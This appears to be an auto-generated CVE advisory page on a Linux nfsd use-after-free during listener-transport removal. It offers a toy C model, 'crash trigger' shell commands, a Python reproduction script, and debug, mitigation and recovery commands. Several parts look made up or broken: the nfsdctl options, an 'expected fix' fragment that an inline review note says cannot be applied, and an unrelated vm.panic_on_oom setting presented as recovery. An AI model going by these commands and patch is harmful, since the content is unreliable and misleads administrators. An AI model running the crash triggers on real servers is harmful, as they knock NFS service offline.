How the CVE Works:
The vulnerability occurs in the Linux kernel's NFS server (nfsd) when managing listener transports. When no nfsd threads are running, a root user can remove a listener transport via nfsdctl while dangling references to it remain in the sp_xprts list. This creates a use-after-free condition when threads are restarted, triggering a refcount overflow warning. The issue stems from improper synchronization between the sv_permsocks and sp_xprts lists during transport removal: when the server restarts, it accesses freed memory through the mismatched transport lists, causing a kernel panic.
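The two-list desynchronization described above, modelled as an added userspace toy (this is not kernel code and not from the page's source). It assumes that only sv_permsocks membership holds a reference and that sp_xprts is a plain ready queue, and it reports the refcount "addition on 0" condition instead of crashing, so the buggy and fixed removal paths can be compared safely.

```c
/* Toy model (added here, not kernel code) of the nfsd listener-removal bug: a
 * transport sits on two lists, sv_permsocks and a pool's sp_xprts. Assumption:
 * only sv_permsocks holds a reference; sp_xprts is a plain ready queue, so a
 * transport must be dequeued from it before the last put(). */
#include <string.h>
#define MAX_XPRTS 4
struct xprt { int refcnt; };            /* models refcount_t; 0 means freed */
struct server {
    struct xprt *permsocks[MAX_XPRTS];  /* sv_permsocks: listener transports */
    struct xprt *sp_xprts[MAX_XPRTS];   /* sp_xprts: per-pool ready queue */
    int nperm, nready;
};

/* refcount_inc() from zero is the use-after-free that
 * refcount_warn_saturate() reports as "addition on 0". */
static int xprt_get(struct xprt *x) { if (x->refcnt == 0) return -1; x->refcnt++; return 0; }
static void xprt_put(struct xprt *x) { x->refcnt--; }   /* hitting 0 would kfree() it */
static void remove_from(struct xprt **list, int *n, struct xprt *x) {
    for (int i = 0; i < *n; i++)
        if (list[i] == x) { memmove(&list[i], &list[i + 1], (*n - i - 1) * sizeof *list); (*n)--; return; }
}
/* Buggy path: unlink from sv_permsocks only, then drop the last reference,
 * leaving a dangling pointer in sp_xprts. */
static void remove_listener_buggy(struct server *s, struct xprt *x) {
    remove_from(s->permsocks, &s->nperm, x);
    xprt_put(x);
}
/* Fixed path: dequeue from sp_xprts as well before the reference can hit zero. */
static void remove_listener_fixed(struct server *s, struct xprt *x) {
    remove_from(s->permsocks, &s->nperm, x);
    remove_from(s->sp_xprts, &s->nready, x);
    xprt_put(x);
}
/* Thread restart takes a reference on every queued transport; returns how
 * many refcount warnings (dangling entries) it tripped over. */
static int restart_threads(struct server *s) {
    int warnings = 0;
    for (int i = 0; i < s->nready; i++)
        if (xprt_get(s->sp_xprts[i]) < 0) warnings++;
    return warnings;
}

/* One listener queued on both lists, removed, then threads restarted. */
int run_scenario(int use_fix) {
    struct xprt tcp = { .refcnt = 1 };
    struct server s = { .permsocks = { &tcp }, .sp_xprts = { &tcp }, .nperm = 1, .nready = 1 };
    if (use_fix) remove_listener_fixed(&s, &tcp); else remove_listener_buggy(&s, &tcp);
    return restart_threads(&s);   /* 1 on the buggy path, 0 on the fixed path */
}
```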
DailyCVE Form:
Platform: Linux Kernel
Version: Up to 6.13.0-rc6+
Vulnerability: Use-After-Free
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploit Analysis:
# Potential crash trigger
$ nfsdctl --remove-transport=rdma
$ echo 1 > /proc/fs/nfsd/threads
Debug Commands:
dmesg | grep refcount_warn_saturate
cat /proc/fs/nfsd/threads
nfsdctl --list-transports
Protection Code:
# Kernel patch verification
git grep -n "svc_xprt_put" net/sunrpc/svc_xprt.c
Mitigation Commands:
# Temporary workaround
echo 0 > /proc/fs/nfsd/threads
rmmod nfsd
modprobe nfsd
Exploit Details:
# Crash reproduction script
import os
os.system("nfsdctl --remove-transport=tcp")
os.system("echo 1 > /proc/fs/nfsd/threads")
Kernel Config Check:
grep CONFIG_NFSD /boot/config-$(uname -r)
Patch Verification:
// Expected fix in svc_xprt.c
+ if (removing)
+     svc_close_all_transports(server);
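Review bot: this fragment is not a complete hunk (no file header, no @@ header, no context or removed lines), so it cannot be applied or checked as shown; the `removing` flag and `svc_close_all_transports()` appear nowhere else on this page, so verify the real change against the upstream kernel commit for this CVE rather than against this sketch.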
Impact Analysis:
# Check active NFS transports
ss -tulnp | grep nfsd
Recovery Commands:
# Emergency restart
systemctl restart nfs-server
sysctl -w vm.panic_on_oom=1
Note that vm.panic_on_oom only controls how the kernel reacts to out-of-memory conditions; it has no bearing on the nfsd transport lists.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode